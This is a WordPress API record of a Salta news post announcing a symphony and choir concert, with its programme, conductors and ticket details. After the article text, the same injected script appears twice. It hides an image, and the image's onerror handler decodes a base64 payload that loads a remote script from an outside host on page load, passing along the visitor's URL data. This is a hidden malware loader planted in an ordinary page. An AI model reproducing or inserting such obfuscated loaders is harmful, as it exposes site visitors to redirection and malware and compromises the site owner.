{"id":4362,"date":"2024-08-28T10:02:49","date_gmt":"2024-08-28T13:02:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4362"},"modified":"2025-08-13T23:49:38","modified_gmt":"2025-08-14T02:49:38","slug":"la-orquesta-sinfonica-de-salta-y-el-estudio-coral-de-salta-se-presentan-en-el-teatro-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4362","title":{"rendered":"La Orquesta Sinf\u00f3nica de Salta y el Estudio Coral de Salta se presentan en el Teatro Provincial"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-af27ca60237809f7449f44cabc7d90b5\" style=\"background-color:#08669d\"><em>El pr\u00f3ximo viernes 30 de agosto a las 21 horas, ambos cuerpos art\u00edsticos ofrecer\u00e1n un concierto en el Teatro Provincial Juan Carlos Saravia bajo la direcci\u00f3n de Jorge Mario Uribe, con la direcci\u00f3n coral de Luciano Garay.<\/em><\/h4>\n\n\n\n<p>La Orquesta Sinf\u00f3nica de Salta interpretar\u00e1: \u201cObertura de Juana de Arco\u201c de Giuseppe Verdi, una pieza cargada de dramatismo y emoci\u00f3n, que refleja la esencia de la hero\u00edna francesa; \u201cPrintemps Suite\u201d de Claude Debussy, una obra que evoca la frescura y el renacimiento de la primavera, a trav\u00e9s de su estilo impresionista caracter\u00edstico. Finalmente, la noche cerrar\u00e1 con la suite de \u201cSue\u00f1o de una noche de verano\u201d de Felix Mendelssohn, junto con el Estudio Coral de Salta, una obra inspirada en la comedia hom\u00f3nima de Shakespeare, que combina magistralmente m\u00fasica y literatura.<\/p>\n\n\n\n<p>El concierto contar\u00e1 con la direcci\u00f3n del maestro Jorge Mario Uribe Gonz\u00e1lez en la batuta y Luciano Garay en la direcci\u00f3n del Estudio Coral de Salta, con la participaci\u00f3n de las sopranos Lucero Sol\u00eds Sim\u00f3n y Romina Andrea como solistas.<\/p>\n\n\n\n<p>La obra central del programa ser\u00e1 la suite de Sue\u00f1o de una noche de verano de Felix Mendelssohn. Esta obra maestra del repertorio sinf\u00f3nico ser\u00e1 el punto culminante de la velada, destac\u00e1ndose por su capacidad para transportar al p\u00fablico al mundo encantado y lleno de magia que William Shakespeare inmortaliz\u00f3 en su famosa comedia.<\/p>\n\n\n\n<p>Las entradas est\u00e1n disponibles en www.saltaticket.gob.ar y en la boleter\u00eda del Teatro Provincial. Adem\u00e1s, se ofrecer\u00e1n entradas sin cargo para estudiantes y adultos mayores, que podr\u00e1n retirarse directamente en la boleter\u00eda del teatro, Zuvir\u00eda 70.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El pr\u00f3ximo viernes 30 de agosto a las 21 horas, ambos cuerpos art\u00edsticos ofrecer\u00e1n un concierto en el Teatro Provincial Juan Carlos Saravia bajo la direcci\u00f3n de Jorge Mario Uribe, con la direcci\u00f3n coral de Luciano Garay. La Orquesta Sinf\u00f3nica de Salta interpretar\u00e1: \u201cObertura de Juana de Arco\u201c de Giuseppe Verdi, una pieza cargada de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4363,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,13],"tags":[],"class_list":{"0":"post-4362","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4362"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4362"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4362\/revisions"}],"predecessor-version":[{"id":6696,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4362\/revisions\/6696"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4363"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4362"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4362"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4362"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}